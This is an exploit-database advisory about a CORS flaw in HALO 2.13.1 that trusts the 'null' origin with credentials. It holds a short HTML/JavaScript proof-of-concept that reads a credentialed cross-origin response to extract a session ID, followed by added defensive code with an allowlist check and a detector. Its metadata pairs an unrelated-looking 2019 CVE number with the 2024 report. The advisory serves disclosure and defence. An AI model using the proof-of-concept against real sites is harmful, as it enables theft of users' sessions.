HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted

| Field | Value |
|---|---|
| CVE | CVE-2019-7164 |
| Category | CWE-201 |
| Price | $15,000 |
| Severity | High |
| Author | Unknown |
| Risk | High |
| Exploitation Type | Remote |
| Date | 2024-03-16 |
| CVSS vector | CVSS:4.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H 0.8344 0.9546 |


## Title: HALO-2.13.1 Cross-origin resource sharing: arbitrary origin trusted
## Author: nu11secur1ty
## Date: 03/15/2024
## Vendor:
## Software:
## Reference:

## Description:
The application implements an HTML5 cross-origin resource sharing (CORS) policy for this request that allows access from any domain.
The application allowed access from the requested origin `null`.
The application allows two-way interaction from the `null` origin. This effectively means that any domain can perform two-way interaction by causing the browser to submit the `null` origin, for example by issuing the request from a sandboxed iframe or a malicious phishing domain with a specially crafted HTML exploit.

STATUS: HIGH - Vulnerability

```html
<h2>CORS POC Exploit</h2>
<h3>Extract SID</h3>

<div id="demo">
<button type="button" onclick="cors()">Exploit Click here</button>
</div>

<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // The advisory shows the cross-origin response in an alert()
      document.getElementById("demo").innerHTML = alert(this.responseText);
    }
  };
  // Target URL is left blank, as in the advisory
  xhttp.open("GET", "", true);
  // Credentials (cookies) are sent with the cross-origin request
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
```
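The following is an added example, not part of the nu11secur1ty advisory and not HALO's own code. It models the server-side decision the advisory describes (reflecting the request's `Origin`, including the literal `null`, while allowing credentials) beside an allowlist-based check, and includes a small detector for the dangerous response shape. The origins in `ALLOWED_ORIGINS` and the probe values are constructed placeholders.

```javascript
// Added example: weak vs. hardened CORS origin handling, plus a detector for
// the "null origin trusted with credentials" condition from the advisory.
// ALLOWED_ORIGINS holds constructed placeholder origins.

const ALLOWED_ORIGINS = new Set([
  "https://app.example.com",   // constructed placeholder
  "https://admin.example.com", // constructed placeholder
]);

// Weak policy: echo whatever Origin the browser sent and allow credentials.
// A request from a sandboxed iframe or a data: URL carries "Origin: null",
// so this hands a session-bearing response to any page able to send it.
function weakCorsHeaders(requestOrigin) {
  if (typeof requestOrigin !== "string") return {};
  return {
    "Access-Control-Allow-Origin": requestOrigin,
    "Access-Control-Allow-Credentials": "true",
  };
}

// Hardened policy: exact match against an allowlist of canonical origins.
// "null", unparsable values, origins carrying a path or trailing slash, and
// look-alike hosts get no CORS headers at all, so the browser blocks the read.
function strictCorsHeaders(requestOrigin) {
  if (typeof requestOrigin !== "string" || requestOrigin === "null") return {};
  let parsed;
  try {
    parsed = new URL(requestOrigin);
  } catch (_e) {
    return {};
  }
  // URL.origin is "scheme://host[:port]"; anything beyond that is rejected.
  if (parsed.origin !== requestOrigin) return {};
  if (!ALLOWED_ORIGINS.has(parsed.origin)) return {};
  return {
    "Access-Control-Allow-Origin": parsed.origin,
    "Access-Control-Allow-Credentials": "true",
    "Vary": "Origin", // keep caches from serving one origin's headers to another
  };
}

// Detection: given the Origin that was sent and the response headers received,
// flag a credentialed response whose ACAO is "null" or reflects an origin that
// is not on the allowlist. Useful when sweeping an app's endpoints with a
// handful of probe origins.
function isDangerousCors(requestOrigin, responseHeaders) {
  const acao = responseHeaders["Access-Control-Allow-Origin"];
  const creds = responseHeaders["Access-Control-Allow-Credentials"] === "true";
  if (!acao || !creds) return false;
  if (acao === "null") return true;
  return acao === requestOrigin && !ALLOWED_ORIGINS.has(acao);
}

// Stand-alone demo over a few constructed Origin values.
const probes = ["null", "https://app.example.com", "https://app.example.com.evil.test"];
for (const origin of probes) {
  console.log(
    origin,
    "weak policy dangerous:", isDangerousCors(origin, weakCorsHeaders(origin)),
    "strict policy dangerous:", isDangerousCors(origin, strictCorsHeaders(origin))
  );
}
```

The hardened function deliberately answers with no CORS headers rather than an error body: a missing `Access-Control-Allow-Origin` is enough for the browser to refuse the cross-origin read, and it avoids leaking which origins are recognised. Reflecting an origin is only safe after it has been matched exactly against a fixed allowlist; any fallback that echoes the request value, or that treats `null` as a harmless default, recreates the condition reported here.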



## Reproduce:

## Proof and Exploit:

## Time spent:

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at and
0day Exploit DataBase
home page:
                          nu11secur1ty <>

Copyright ©2024 Exploitalert.
